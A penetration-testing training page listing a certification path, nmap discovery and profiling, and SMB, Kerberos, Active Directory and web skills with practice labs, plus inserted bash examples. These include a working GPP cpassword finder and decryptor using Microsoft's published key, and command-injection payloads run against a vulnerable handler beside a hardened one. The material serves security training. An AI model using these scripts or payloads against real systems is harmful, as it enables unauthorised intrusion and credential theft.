THE CU
  • Home
  • Blogs
  • Offense
    • Pen Tester Training Program
    • Offensive Cheat Sheets >
      • Bash Commands
      • Network Enumeration
      • Web Enumeration
      • Windows Post Ex
      • Metasploit
      • Shells
      • PowerShell
    • Offensive Links
  • Defense
    • Junior SOC Analyst Roadmap
    • Intermediate SOC Analyst Training Program
    • Defense Links
    • RDP Analysis
  • Land A Job
    • Entry-Level InfoSec Jobs
    • Improve Resume
    • Find a Job
    • Interview Prep
    • Grow as a Practitioner
    • Get Experience
  • FAQS
  • Other
    • Certifications
    • Finance, Travel, and Mental HealthBooks
    • Finance Resources
    • Infosec Conferences
    • CTFs
    • Cyber Ranges
    • Twitter People to Follow
    • Podcasts
    • Books
    • Twitch Streamers

Pen Tester Training Program

Disclaimer: Use this information only in a controlled manner and only on systems you have permission to use. Any illegal use is your responsibility, as is learning the laws in your country, state, province or county and abiding by them.
Another free training program from the mind at The Cyber Union. This free resource is meant for those looking to get into penetration testing who have no idea where to start. The program will contain resources on topics that I believe to be applicable in the real world.

Like the analyst program, this will be continuously built over time as I come across resources on specific topics. Enjoy, and let me know what you think.

Certification Road Map

Last Update: 10/23/2021

Based on the exams I have taken or the study guides I have read through, the following path is what I would take if I were to go back in time and start over. Others may suggest different certifications and different orders, which is cool. But for me, this would be the most efficient chain. I will update it as I come across new materials.
[Certification road map image]

Starting Point

TryHackMe - Complete Beginner Learning Path
In my opinion, TryHackMe is a much easier starting point than HackTheBox. The content creators do a good job of making the skill sets accessible to beginners with zero knowledge. One warning: access to the path is not free; it requires a subscription at $10 USD a month. On the upside, you do get a certificate for completing the path, which can be added to your resume to help you land an interview.

Areas of Study

Discovery

This is a simple concept: figure out which targets are reachable from where you are. Nmap is your friend for this stage. In a CTF environment, simply scan the /24 subnet to get started. On a real-life engagement, the customer will most likely tell you what your target ranges are.
Sample Nmap Commands

    
You may run into instances where every host responds, or nothing responds although there should be some live hosts. In that case, try a different type of discovery probe, such as an ICMP echo scan, and compare the results.

    

Profiling

This scan is meant to discover listening services on your live hosts. The reason these are separate steps is that it's faster, in my experience. When you run one large scan, such as combined discovery and profiling, and something goes wrong, you have to restart all your efforts. That could mean hours of work. If you do them one piece at a time, there is much less work to redo.

Some pen testers get pretty crazy with their profiling scans, which is cool, but most of the time a simple scan works great.

    
This scan enumerates all TCP ports, a handful of UDP ports, the OS and service versions, and disables the ping sweep. Pretty much everything you need. Notice that I fed it a list of live hosts with the -iL switch; I got those hosts from the discovery scan with some simple command-line fu.

    
You may be saying, "Silverbits, f that. I want to do it with one command." Ok, go for it. In your practice lab, there is no reason to split this up.
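The discovery and profiling steps described above, as one added example that is not the page's own commands: a small pipeline around nmap that sweeps the range, pulls the live hosts out of the greppable output (the "command-line fu"), and profiles only those hosts, with the one-command lab version alongside. The target range, output names, UDP port list and the sample .gnmap content are assumptions; with NMAP_DRY_RUN=1 the nmap commands are printed instead of executed so the parsing step can be run offline.

```bash
#!/usr/bin/env bash
# Added example, not the page's own commands: a discovery -> profiling pipeline
# around nmap that follows the split described above. The target range, output
# names and the UDP port list are assumptions. With NMAP_DRY_RUN=1 the nmap
# commands are printed instead of executed, so the host-extraction step can be
# exercised offline against the constructed .gnmap sample below.
# nmap itself needs root for -sS/-sU/-O (run the pipeline with sudo).

UDP_PORTS=${UDP_PORTS:-53,67,69,111,123,137,161,500,1434}

nmap_run() {   # execute, or just print the command line under NMAP_DRY_RUN
  if [ "${NMAP_DRY_RUN:-0}" = 1 ]; then echo "$*"; else "$@"; fi
}

# Discovery: which hosts answer at all. $1 = range, $2 = output basename.
# As root, -sn sends ICMP echo, TCP SYN to 443, TCP ACK to 80 and an ICMP
# timestamp request; -n skips reverse DNS, which is slow and noisy.
discovery_scan() {
  nmap_run nmap -sn -n "$1" -oA "$2"
}

# If every host looks up (a middlebox answers for everything) or none does
# (the default probes are filtered), change the probe and compare result sets:
#   -PE           ICMP echo only (the "echo scan")
#   -PS22,80,445  TCP SYN ping to ports likely to be open
#   -PA80,443     TCP ACK ping, which stateless filters often let through
# $1 = range, $2 = probe flag, $3 = output basename.
discovery_scan_alt() {
  nmap_run nmap -sn -n "$2" "$1" -oA "$3"
}

# The "command-line fu": one IP per line for every host the greppable
# (.gnmap) output marks Up, duplicates dropped.
live_hosts_from_gnmap() {
  awk '/^Host:/ && /Status: Up/ && !seen[$2]++ { print $2 }' "$1"
}

# Profiling: every TCP port, a handful of UDP ports, service versions and OS.
# -Pn stops nmap from redoing host discovery on hosts we already know are up.
# $1 = file of live hosts, $2 = output basename.
profile_scan() {
  nmap_run nmap -Pn -n -sS -sU -p "T:1-65535,U:$UDP_PORTS" -sV -O -iL "$1" -oA "$2"
}

# The one-command version for a lab: discovery and profiling in a single run.
# $1 = range, $2 = output basename.
full_scan() {
  nmap_run nmap -n -sS -sU -p "T:1-65535,U:$UDP_PORTS" -sV -O "$1" -oA "$2"
}

# Constructed sample of a discovery .gnmap (not real scan output); note the
# duplicate line, which happens when two scanned ranges overlap.
SAMPLE_GNMAP='# Nmap 7.92 scan initiated as: nmap -sn -n 10.10.10.0/24 -oA discovery
Host: 10.10.10.1 ()  Status: Up
Host: 10.10.10.5 ()  Status: Up
Host: 10.10.10.5 ()  Status: Up
Host: 10.10.10.40 ()  Status: Up
# Nmap done -- 256 IP addresses (3 hosts up) scanned in 4.12 seconds'

# Discovery -> live host list -> profiling, with separate output files so a
# crash during profiling never costs the discovery results.
# $1 = range, $2 = working directory.
pipeline() {
  discovery_scan "$1" "$2/discovery"
  if [ "${NMAP_DRY_RUN:-0}" = 1 ]; then   # no real scan ran: use the sample
    printf '%s\n' "$SAMPLE_GNMAP" > "$2/discovery.gnmap"
  fi
  live_hosts_from_gnmap "$2/discovery.gnmap" > "$2/live.txt"
  profile_scan "$2/live.txt" "$2/profile"
}
```

Run it as `sudo NMAP_DRY_RUN=0 bash -c '. ./scan.sh; pipeline 10.10.10.0/24 ./engagement'` (the file name is an assumption). The -oA outputs give you normal, XML and greppable files for each stage, so if the profiling scan dies you rerun only profile_scan against the saved live.txt.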

    

Services

Understanding services, how they work, and how to connect to them is a fundamental part of any pen tester's tool kit. Below are the top services that I look at in customer environments.

SMB/NetBios

Server Message Block (SMB) is one of the most common services in an environment. There will almost always be shares on a network, and the associated ports (139, 445) are often open. If you can connect to them, you can gather loads of intel and perhaps gain an initial foothold.
Skills To Learn:
  • Connect to share
  • Mount share
  • Use PsExec
  • Null Sessions
  • Retrieve password policy
  • Password spraying
Practice Labs
HTB-Monteverde
  • Practice NULL sessions (enum4linux, smbclient, smbmap)
  • Practice password bruteforcing (Metasploit:smb_login)
  • Practice mounting shares
  • Practice browsing shares using smbclient and smbmap
HTB-Resolute
  • Practice Nmap Profiling scan
  • Practice NULL sessions (enum4linux, smbclient, smbmap)
  • Practice password bruteforcing (Metasploit:smb_login)


Kerberos

Kerberos is available in pretty much every business environment today. If you can understand how the service works and how you can manipulate it, you will have a very handy tool in your box.
Skills To Learn:
  • Kerberoasting
  • AS-REP Roasting
  • Golden/Silver Ticket Attacks
  • Pass the Ticket
  • Skeleton key Attack
  • BloodHound
  • Using a ticket in Linux
Videos
Kerberos Authentication Explained | A deep dive by Destination Certification
Practice Labs
HTB-Blackfield
  • Practice checking for pre-authentication with Impacket's GetNPUsers.py
  • Practice cracking the krb5asrep hash with hashcat or John the Ripper
TryHackMe - Attacking Kerberos
  • Practice all the basic Kerberos attacks: Kerberoasting, AS-REP Roasting, Golden/Silver Ticket attacks, Pass the Ticket, and Skeleton Key

Active Directory

Like Kerberos, Active Directory is integral to virtually every business environment you will see as a pen tester. Understanding how to navigate the structure and interact with users and devices via Active Directory is an amazing skill to have.
Skills To Learn:
  • GPO
  • BloodHound
  • Domain Hierarchy
  • Adding/modifying users and group memberships
  • Domain Trusts
  • GPP Attack
  • ZeroLogon
Practice Labs
HTB Track - Active Directory 101
  • Work through all the boxes in this track
  • Don't be ashamed to use walkthroughs. These labs are meant to teach you what is possible. Learn the tricks, document them, and try to do it on your own the next time you come across it.
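The GPP attack from the skills list, as an added example that is not from the page: recovering a password from the cpassword attribute of a Groups.xml found on SYSVOL. The AES-256 key is the one Microsoft published for Group Policy Preferences (MS-GPPREF); everything else (host names, the sample Groups.xml, the demo password) is constructed. The crypto steps need openssl, base64 and iconv; the XML parsing needs only grep and sed.

```bash
#!/usr/bin/env bash
# Added example, not from the page: the Group Policy Preferences (GPP) attack,
# i.e. recovering a password from a cpassword attribute in a Groups.xml on
# SYSVOL. The AES-256 key is the one Microsoft published in MS-GPPREF; the
# Groups.xml below is a constructed sample. Needs openssl, base64 and iconv for
# the crypto; the XML parsing needs only grep and sed.

GPP_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_IV=00000000000000000000000000000000

# Where to look (comment only; needs a domain credential or open SYSVOL):
#   smbclient //dc01/SYSVOL -U corp/user%pass -c 'recurse; ls *.xml'
#   grep -rl cpassword /mnt/sysvol/corp.local/Policies/

# Print "userName cpassword" for every <Properties> element that carries a
# cpassword. Attribute order varies between files, so each is pulled separately.
gpp_find_cpassword() {
  grep -o '<Properties [^>]*cpassword="[^"]*"[^>]*>' "$1" | while IFS= read -r tag; do
    user=$(printf '%s' "$tag" | sed -n 's/.*userName="\([^"]*\)".*/\1/p')
    cpass=$(printf '%s' "$tag" | sed -n 's/.*cpassword="\([^"]*\)".*/\1/p')
    [ -n "$cpass" ] || continue
    printf '%s %s\n' "${user:-<no userName>}" "$cpass"
  done
}

# cpassword is base64 (padding stripped) of AES-256-CBC over the UTF-16LE
# password, with the published key and an all-zero IV. Re-pad, then reverse.
gpp_decrypt() {
  c=$1
  while [ $(( ${#c} % 4 )) -ne 0 ]; do c="$c="; done
  printf '%s' "$c" | base64 -d |
    openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" |
    iconv -f UTF-16LE -t UTF-8
}

# Reverse of gpp_decrypt; used here only to build a demo file with a known
# answer. It works because the key is the same in every domain.
gpp_encrypt() {
  printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE |
    openssl enc -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" | base64 | tr -d '=\n'
}

# Constructed Groups.xml showing the layout; the cpassword value here is a
# placeholder, not a real ciphertext (gpp_demo builds a decryptable one).
SAMPLE_GROUPS_XML='<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="backup_svc" image="2" changed="2021-09-14 10:02:11">
    <Properties action="U" newName="" fullName="" description="Backup service" cpassword="Q29uc3RydWN0ZWRTYW1wbGU" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="CORP\backup_svc"/>
  </User>
</Groups>'

# End-to-end demo: write a Groups.xml with a freshly encrypted password, find
# the attribute, decrypt it. $1 = password to hide, $2 = working directory.
gpp_demo() {
  c=$(gpp_encrypt "$1")
  printf '<Groups>\n <User name="svc">\n  <Properties action="U" cpassword="%s" userName="CORP\\svc"/>\n </User>\n</Groups>\n' "$c" > "$2/Groups.xml"
  gpp_find_cpassword "$2/Groups.xml" | while read -r user cpass; do
    printf '%s => %s\n' "$user" "$(gpp_decrypt "$cpass")"
  done
}
```

Microsoft stopped writing cpassword in 2014 (MS14-025), but the patch does not remove existing files, so old Groups.xml, ScheduledTasks.xml and Services.xml on SYSVOL still turn up on engagements.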

Web

Web services are another no-brainer to learn. Even if you don't become a master of web attacks, understanding the basics of web services can take you far.
Skills To Learn:
  • Directory Bruteforcing
  • Web Shells
  • Basic XSS
  • Basic SQLi
  • Command Injection
  • Remote Code Execution
  • Setting up a web service
  • Understanding permissions of web service
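Command injection and the permissions of the web service, from the skills list above, as an added example that is not from the page: the bug behind many "ping this host" web utilities, shown as a vulnerable handler next to a hardened one so the difference is visible on the same payloads. PING_CMD is an assumption for offline runs; it stands in for the real ping binary so nothing touches the network.

```bash
#!/usr/bin/env bash
# Added example, not from the page: the command-injection bug behind many
# "ping this host" web utilities, as a vulnerable handler next to a hardened
# one. PING_CMD is an assumption for offline runs: it stands in for the real
# ping so the demo needs no network access.

PING_CMD=${PING_CMD:-"echo ping -c 1"}

# Vulnerable: the request parameter is pasted into a command string that a
# shell re-parses, so ';', '|', '&&', $(...) and backticks in the input become
# commands. Same bug whether the caller is a CGI script, PHP's shell_exec()
# or Python's os.system(); the shell is the problem, not the language.
ping_host_vulnerable() {
  sh -c "$PING_CMD $1"
}

# Hardened: allow-list the value (hostnames and IPs need only letters, digits,
# '.', ':' and '-'), then hand it to the program as ONE argv element so no
# shell ever sees it. Input that fails the check is rejected, not "cleaned".
ping_host_hardened() {
  case "$1" in
    ''|*[!A-Za-z0-9.:-]*) echo "rejected host parameter" >&2; return 1 ;;
  esac
  $PING_CMD "$1"   # PING_CMD is operator-controlled config; $1 is not
}

# Payloads a scanner or a curious user would send as ?host=... (kept harmless
# here: they only echo markers instead of fetching a web shell).
INJECTION_PAYLOADS='127.0.0.1; echo INJECTED
127.0.0.1 | echo PIPED
$(echo SUBSHELL)'

# Run one payload through both handlers and show what each did.
compare_handlers() {
  echo "payload: $1"
  echo "  vulnerable -> $(ping_host_vulnerable "$1" | tr '\n' ' ')"
  if out=$(ping_host_hardened "$1" 2>&1); then
    echo "  hardened   -> $out"
  else
    echo "  hardened   -> $out"
  fi
}

demo() {
  printf '%s\n' "$INJECTION_PAYLOADS" | while IFS= read -r p; do
    compare_handlers "$p"
  done
  compare_handlers dc01.corp.local
}
```

The hardened handler still runs whatever ping does with the privileges of the web server's account, which is the "permissions of the web service" point: keep that account unprivileged, with no sudo rules and no write access to the web root, so a bug you missed yields a low-privilege shell rather than a web shell you can drop into the document root.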